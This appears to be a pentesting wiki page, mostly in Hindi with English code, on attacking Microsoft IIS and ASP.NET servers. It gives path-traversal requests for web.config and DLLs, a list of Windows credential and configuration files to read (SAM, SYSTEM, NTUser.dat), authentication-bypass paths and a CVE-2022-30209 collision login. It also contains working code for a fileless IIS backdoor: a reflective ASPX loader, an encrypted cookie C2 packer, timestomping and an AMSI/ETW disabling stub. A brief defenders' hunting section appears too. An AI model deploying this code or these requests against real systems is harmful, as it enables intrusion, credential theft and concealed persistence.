IIS - Internet Information Services

Reading time: 17 minutes

Test executable file extensions:

• asp
• aspx
• config
• php

आंतरिक IP पते का खुलासा

किसी भी IIS सर्वर पर जहाँ आपको 302 मिलता है, आप Host header को निकालकर और HTTP/1.0 का उपयोग करके कोशिश कर सकते हैं, और response के अंदर Location header आंतरिक IP पते की ओर इशारा कर सकता है:

nc -v domain.com 80
openssl s_client -connect domain.com:443

आंतरिक IP का खुलासा करने वाली प्रतिक्रिया:

GET / HTTP/1.0

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016

Execute .config files

You can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: Download example here

More information and techniques to exploit this vulnerability here

IIS Discovery Bruteforce

मेरी बनाई हुई सूची डाउनलोड करें:

यह निम्नलिखित सूचियों की सामग्री को मर्ज करके बनाई गई थी:

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt
http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html
https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt
https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt

इसे किसी एक्सटेंशन को जोड़ें बिना उपयोग करें — जिन फाइलों को एक्सटेंशन चाहिए वे पहले से ही उसमें शामिल हैं।

Path Traversal

Leaking source code

पूर्ण writeup देखें: https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html

In .Net MVC applications, the web.config file plays a crucial role by specifying each binary file the application relies on through "assemblyIdentity" XML tags.

Exploring Binary Files

नीचे web.config फ़ाइल तक पहुँचने का एक उदाहरण दिखाया गया है:

GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded

यह अनुरोध विभिन्न सेटिंग्स और निर्भरताएँ प्रकट करता है, जैसे कि:

• EntityFramework संस्करण
• AppSettings — वेबपेज, क्लाइंट सत्यापन और JavaScript के लिए
• System.web — प्रमाणीकरण और रनटाइम के लिए कॉन्फ़िगरेशन
• System.webServer के मॉड्यूल सेटिंग्स
• Runtime के लिए assembly bindings कई लाइब्रेरीज़ जैसे Microsoft.Owin, Newtonsoft.Json, और System.Web.Mvc के लिए

ये सेटिंग्स संकेत देती हैं कि कुछ फ़ाइलें, जैसे /bin/WebGrease.dll, एप्लिकेशन के /bin फ़ोल्डर में स्थित हैं।

Root Directory Files

रूट डायरेक्टरी में पाई जाने वाली फ़ाइलें, जैसे /global.asax और /connectionstrings.config (जो संवेदनशील पासवर्ड रखती है), एप्लिकेशन की कॉन्फ़िगरेशन और संचालन के लिए आवश्यक हैं।

Namespaces and Web.Config

MVC applications भी विशिष्ट namespaces के लिए अतिरिक्त web.config files परिभाषित करते हैं ताकि प्रत्येक फ़ाइल में दोहराव वाली घोषणाओं से बचा जा सके, जैसा कि एक अन्य web.config डाउनलोड करने के अनुरोध से दिखाया गया है:

GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded

DLLs डाउनलोड करना

कस्टम namespace का उल्लेख यह संकेत देता है कि /bin डायरेक्टरी में WebApplication1 नामक एक DLL मौजूद है। इसके बाद WebApplication1.dll डाउनलोड करने का अनुरोध दिखाया गया है:

GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded

यह संकेत देता है कि /bin डायरेक्टरी में अन्य आवश्यक DLLs मौजूद हैं, जैसे System.Web.Mvc.dll और System.Web.Optimization.dll।

एक स्थिति में जहाँ एक DLL WebApplication1.Areas.Minded नाम का namespace import करता है, एक हमलावर अनुमान लगा सकता है कि पूर्वानुमेय पथों में अन्य web.config फ़ाइलें मौजूद होंगी, जैसे /area-name/Views/, जो विशिष्ट कॉन्फ़िगरेशन और /bin फ़ोल्डर में अन्य DLLs के संदर्भ रखती हैं। उदाहरण के लिए, /Minded/Views/web.config पर एक अनुरोध उन कॉन्फ़िगरेशन और namespaces को उजागर कर सकता है जो एक और DLL, WebApplication1.AdditionalFeatures.dll, की मौजूदगी का संकेत देते हैं।

सामान्य फ़ाइलें

स्रोत: here

C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
c:\Program Files (x86)\php\php.ini"
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml

HTTPAPI 2.0 404 Error

If you see an error like the following one:

It means that the server Host header के अंदर सही domain name प्राप्त नहीं हुआ.
वेब पेज तक पहुँचने के लिए आप सर्व किए गए SSL Certificate को देख सकते हैं और शायद वहाँ domain/subdomain नाम मिल जाए। अगर वह वहाँ नहीं है तो आपको सही एक मिलने तक brute force VHosts करना पड़ सकता है।

Encrypted configuration और ASP.NET Core Data Protection key rings को Decrypt करें

IIS-hosted .NET apps पर गोपनीय जानकारी सुरक्षित करने के दो सामान्य पैटर्न हैं:

• ASP.NET Protected Configuration (RsaProtectedConfigurationProvider) — web.config के सेक्शंस (जैसे ) के लिए।
• ASP.NET Core Data Protection key ring (स्थानीय रूप से persisted) — application secrets और cookies की रक्षा के लिए उपयोग होता है।

यदि आपके पास वेब सर्वर पर filesystem या interactive access है, तो साथ में मौजूद keys अक्सर उन्हें decrypt करने की अनुमति देती हैं।

• ASP.NET (Full Framework) – protected config sections को aspnet_regiis से decrypt करें:

# Decrypt a section by app path (site configured in IIS)
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pd "connectionStrings" -app "/MyApplication"

# Or specify the physical path (-pef/-pdf write/read to a config file under a dir)
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pdf "connectionStrings" "C:\inetpub\wwwroot\MyApplication"

• ASP.NET Core – स्थानीय रूप से संग्रहीत Data Protection key rings (XML/JSON फाइलें) को निम्न जैसे स्थानों पर देखें:
• %PROGRAMDATA%\Microsoft\ASP.NET\DataProtection-Keys
• HKLM\SOFTWARE\Microsoft\ASP.NET\Core\DataProtection-Keys (registry)
• App-managed folder (e.g., App_Data\keys or a Keys directory next to the app)

Key ring उपलब्ध होने पर, ऐप की identity में चल रहा एक ऑपरेटर समान purposes के साथ IDataProtector instantiate कर सकता है और संग्रहीत secrets को unprotect कर सकता है। यदि key ring को app फ़ाइलों के साथ misconfigure होकर store किया गया हो, तो host compromise होने पर offline decryption trivial हो जाता है।

IIS fileless backdoors and in-memory .NET loaders (NET-STAR style)

The Phantom Taurus/NET-STAR toolkit फ़ाइललेस IIS persistence और post‑exploitation के लिए w3wp.exe के अंदर पूरी तरह से एक परिपक्व पैटर्न दिखाती है। मूल विचार कस्टम tradecraft और detection/hunting के लिए व्यापक रूप से पुन:उपयोगी हैं।

Key building blocks

• ASPX bootstrapper hosting an embedded payload: एक single .aspx पेज (उदा., OutlookEN.aspx) एक Base64‑encoded, विकल्पानुसार Gzip‑compressed .NET DLL रखता है। trigger request पर यह decode, decompress और reflectively load करके current AppDomain में लोड होता है और main entry point (उदा., ServerRun.Run()) को invoke करता है।
• Cookie‑scoped, encrypted C2 with multi‑stage packing: tasks/results को Gzip → AES‑ECB/PKCS7 → Base64 के साथ wrap किया गया और दिखने में वैध cookie‑heavy requests के जरिए भेजा गया; operators ने chunking के लिए stable delimiters (उदा., "STAR") का उपयोग किया।
• Reflective .NET execution: arbitrary managed assemblies को Base64 के रूप में accept करें, Assembly.Load(byte[]) के जरिए load करें और बिना disk को छुए rapid module swaps के लिए operator args पास करें।
• Operating in precompiled ASP.NET sites: साइट precompiled होने पर भी auxiliary shells/backdoors जोड़ना/प्रबंधित करना (उदा., dropper dynamic pages/handlers जोड़ता है या config handlers का उपयोग करता है) – यह bypassPrecompiledApp, addshell, listshell, removeshell जैसे commands से एक्सपोज़ होता है।
• Timestomping/metadata forgery: changeLastModified action और deployment पर timestomp (भविष्य के compilation timestamps सहित) लागू करके DFIR को कठिन बनाना।
• Optional AMSI/ETW pre‑disable for loaders: दूसरा‑स्टेज loader Assembly.Load कॉल करने से पहले AMSI और ETW को disable कर सकता है ताकि in‑memory payloads की inspection कम हो सके।

Minimal ASPX loader pattern

<%@ Page Language="C#" %>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.IO.Compression" %>
<%@ Import Namespace="System.Reflection" %>
<script runat="server">
protected void Page_Load(object sender, EventArgs e){
// 1) Obtain payload bytes (hard‑coded blob or from request)
string b64 = /* hardcoded or Request["d"] */;
byte[] blob = Convert.FromBase64String(b64);
// optional: decrypt here if AES is used
using(var gz = new GZipStream(new MemoryStream(blob), CompressionMode.Decompress)){
using(var ms = new MemoryStream()){
gz.CopyTo(ms);
var asm = Assembly.Load(ms.ToArray());
// 2) Invoke the managed entry point (e.g., ServerRun.Run)
var t = asm.GetType("ServerRun");
var m = t.GetMethod("Run", BindingFlags.Public|BindingFlags.NonPublic|BindingFlags.Static|BindingFlags.Instance);
object inst = m.IsStatic ? null : Activator.CreateInstance(t);
m.Invoke(inst, new object[]{ HttpContext.Current });
}
}
}
</script>

Packing/crypto सहायक (Gzip + AES‑ECB + Base64)

using System.Security.Cryptography;

static byte[] AesEcb(byte[] data, byte[] key, bool encrypt){
using(var aes = Aes.Create()){
aes.Mode = CipherMode.ECB; aes.Padding = PaddingMode.PKCS7; aes.Key = key;
ICryptoTransform t = encrypt ? aes.CreateEncryptor() : aes.CreateDecryptor();
return t.TransformFinalBlock(data, 0, data.Length);
}
}

static string Pack(object obj, byte[] key){
// serialize → gzip → AES‑ECB → Base64
byte[] raw = Serialize(obj);                    // your TLV/JSON/msgpack
using var ms = new MemoryStream();
using(var gz = new GZipStream(ms, CompressionLevel.Optimal, true)) gz.Write(raw, 0, raw.Length);
byte[] enc = AesEcb(ms.ToArray(), key, true);
return Convert.ToBase64String(enc);
}

static T Unpack<T>(string b64, byte[] key){
byte[] enc = Convert.FromBase64String(b64);
byte[] cmp = AesEcb(enc, key, false);
using var gz = new GZipStream(new MemoryStream(cmp), CompressionMode.Decompress);
using var outMs = new MemoryStream(); gz.CopyTo(outMs);
return Deserialize<T>(outMs.ToArray());
}

Cookie/session प्रवाह और command surface

• Session bootstrap और tasking cookies के माध्यम से किए जाते हैं ताकि यह सामान्य web activity में घुल-मिल जाए।
• वास्तविक दुनिया में देखे गए Commands में शामिल थे: fileExist, listDir, createDir, renameDir, fileRead, deleteFile, createFile, changeLastModified; addshell, bypassPrecompiledApp, listShell, removeShell; executeSQLQuery, ExecuteNonQuery; and dynamic execution primitives code_self, code_pid, run_code for in‑memory .NET execution.

Timestomping उपयोगिता

File.SetCreationTime(path, ts);
File.SetLastWriteTime(path, ts);
File.SetLastAccessTime(path, ts);

Assembly.Load (loader variant) से पहले Inline AMSI/ETW को अक्षम करें

// Patch amsi!AmsiScanBuffer to return E_INVALIDARG
// and ntdll!EtwEventWrite to a stub; then load operator assembly
DisableAmsi();
DisableEtw();
Assembly.Load(payloadBytes).EntryPoint.Invoke(null, new object[]{ new string[]{ /* args */ } });

See AMSI/ETW bypass techniques in: windows-hardening/av-bypass.md

Hunting notes (defenders)

• Single, odd ASPX page with very long Base64/Gzip blobs; cookie‑heavy posts.
• Unbacked managed modules inside w3wp.exe; strings like Encrypt/Decrypt (ECB), Compress/Decompress, GetContext, Run.
• Repeated delimiters like "STAR" in traffic; mismatched or even future timestamps on ASPX/assemblies.

Telerik UI WebResource.axd unsafe reflection (CVE-2025-3600)

कई ASP.NET apps में Telerik UI for ASP.NET AJAX इंबेड किया होता है और वह अनऑथेंटिकेटेड handler Telerik.Web.UI.WebResource.axd को एक्सपोज़ करते हैं। जब Image Editor cache endpoint (type=iec) पहुँचयोग्य होता है, तब पैरामीटर dkey=1 और prtype unsafe reflection को सक्षम करते हैं जो pre‑auth में किसी भी public parameterless constructor को execute कर देते हैं। इससे एक यूनिवर्सल DoS primitive मिलता है और insecure AppDomain.AssemblyResolve handlers वाले apps पर यह pre‑auth RCE तक escalate भी कर सकता है।

See detailed techniques and PoCs here:

Telerik Ui Aspnet Ajax Unsafe Reflection Webresource Axd

Old IIS vulnerabilities worth looking for

Microsoft IIS tilde character “~” Vulnerability/Feature – Short File/Folder Name Disclosure

आप हर पाए गए फ़ोल्डर के अंदर मौजूद फ़ोल्डर्स और फाइलों को enumerate करने की कोशिश कर सकते हैं (यहाँ तक कि अगर वह Basic Authentication मांग रहा हो) इस technique का उपयोग करके.
इस technique की मुख्य सीमा, यदि सर्वर वल्नरेबल है, यह है कि यह प्रत्येक file/folder के नाम के केवल पहले 6 अक्षर और फाइल एक्सटेंशन के पहले 3 अक्षर तक ही पता लगा सकता है।

आप https://github.com/irsdl/IIS-ShortName-Scanner का उपयोग करके इस vulnerability का टेस्ट कर सकते हैं:java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/

Original research: https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf

आप metasploit भी उपयोग कर सकते हैं: use scanner/http/iis_shortname_scanner

एक अच्छा विचार यह है कि खोजी गई फाइलों का अंतिम नाम जानने के लिए आप LLMs से विकल्प पूछें, जैसा कि स्क्रिप्ट में किया गया है https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py

Basic Authentication bypass

Bypass a basic authentication (IIS 7.5) trying to access: /admin:$i30:$INDEX_ALLOCATION/admin.php or /admin::$INDEX_ALLOCATION/admin.php

आप इस vulnerability और पिछले वाले को mix करके नए folders खोजने और authentication को bypass करने की कोशिश कर सकते हैं।

ASP.NET Trace.AXD enabled debugging

ASP.NET में एक debugging मोड होता है और उसकी फाइल का नाम trace.axd है।

यह किसी application पर किए गए सभी requests का बहुत विस्तृत लॉग किसी समयावधि में रखता है।

यह जानकारी remote client IP's, session IDs, सभी request और response cookies, physical paths, source code information, और सम्भवतः usernames और passwords तक शामिल कर सकती है।

https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/

ASPXAUTH Cookie

ASPXAUTH uses the following info:

• validationKey (string): hex-encoded key to use for signature validation.
• decryptionMethod (string): (default “AES”).
• decryptionIV (string): hex-encoded initialization vector (defaults to a vector of zeros).
• decryptionKey (string): hex-encoded key to use for decryption.

हालाँकि, कुछ लोग इन पैरामीटरों के default values इस्तेमाल करते हैं और cookie के रूप में उपयोगकर्ता का email रख देते हैं। इसलिए, अगर आप एक ऐसा वेब ढूँढ लें जो उसी platform का उपयोग कर रहा हो और वह ASPXAUTH cookie उपयोग कर रहा हो, और आप हमले के लक्षित सर्वर पर उस user के email के साथ एक user बना दें, तो आप दूसरे सर्वर की cookie को पहले सर्वर में इस्तेमाल करके उस user का impersonate कर सकते हैं।
यह attack इस writeup में काम कर गया था।

IIS Authentication Bypass with cached passwords (CVE-2022-30209)

Full report here: कोड में एक बग था जिसने user द्वारा दिए गए password की सही तरीके से जांच नहीं की, इसलिए एक attacker जिसका password hash किसी ऐसे key पर गिरता है जो पहले से cache में मौजूद है, वह उस user के रूप में login कर सकेगा।

# script for sanity check
> type test.py
def HashString(password):
j = 0
for c in map(ord, password):
j = c + (101*j)&0xffffffff
return j

assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')

# before the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 401 Unauthorized

# after the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK

संदर्भ

• Unit 42 – Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite
• AMSI/ETW bypass background (HackTricks)